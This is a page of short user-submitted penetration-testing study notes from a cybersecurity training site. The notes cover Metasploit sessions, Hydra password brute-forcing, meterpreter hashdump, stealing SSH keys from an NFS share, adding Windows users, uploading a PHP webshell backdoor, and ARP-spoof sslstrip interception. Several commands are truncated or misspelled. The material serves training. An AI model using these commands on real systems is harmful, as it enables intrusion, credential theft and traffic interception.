Advanced Penetration Testing Notes

Syntax Error

As by default IPV6 syntax will be used, Try /router_add// /target_add//   use / address // [view]

By: PRATEEK | Related Lesson: Traffic Capture (part 5) ettercap | Modified: May 17, 2017

Session metasploit

session -l  Lists the sessions opened previously(background session), usually it runs in background by pressing ctrl+z To get back into the session we can do sessions -i <session ID> [view]

By: praveenAgent47 | Related Lesson: Metasploit (part 3) Operation | Modified: May 17, 2017


connect vs connect_ex [view]

By: suhailmt | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: May 17, 2017

Offline Password Attacks

nano windowshashes.txt   [view]

By: rspeight10 | Related Lesson: Passwords (part 3) Offline Password Attacks | Modified: May 16, 2017

Online Password Hacking

hydra -l <username> -p <password> -L (list of names) -P (List of Password) hydra -l Georgia -P passwords.txt ftp [view]

By: rspeight10 | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: May 16, 2017

Password Attacks

meterpreter > hashdump bkhive system syskey.txt samdump2 sam syskey.txt   [view]

By: rspeight10 | Related Lesson: Passwords (part 1) Password Attacks | Modified: May 16, 2017

Attaching to an IP

Network file system showmount -e <ip-address> mkdir /tmp/georgia mount -t nfs -o nolock /tmp/Georgia cd /tmp/georgia ls -a (shows hidden directories) cat authorized_keys cp id_rsa /root/.ssh/id_rsa apt-get install [view]

By: rspeight10 | Related Lesson: Exploitation (part 6) Attaching to an IP Address | Modified: May 16, 2017

SQL Commands (you have access to MySQL DB) net user james Georgia /add atftpd –daemon –bind-address /tmp netstat -antp get meterpreter.php c:\ [view]

By: rspeight10 | Related Lesson: Exploitation (part 2) SQL Commands | Modified: May 16, 2017

Direct Exploitation

cadaver wampp xampp nano test.txt make sure you can upload files192.168.1.76/webdev/test.txt /usr/share/webshells cd php simple-backdoor.php /usr/share/webshells/php> cadaver http://192.168. [view]

By: rspeight10 | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: May 16, 2017

SSL Stripping

SSL Man in the Middle (arpspoof the ipaddress) enable arpspoofinf arpspoof -i eth0 -t enable iptables rules iptables-t nat -PREROUTING -p tcp –destionation-port 80 -j REDIRECT –to-port 8080 sslstrip -l 8080     [view]

By: rspeight10 | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: May 16, 2017

« First ‹ Previous 1 42 132 140 141 142 143 144 152 242 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?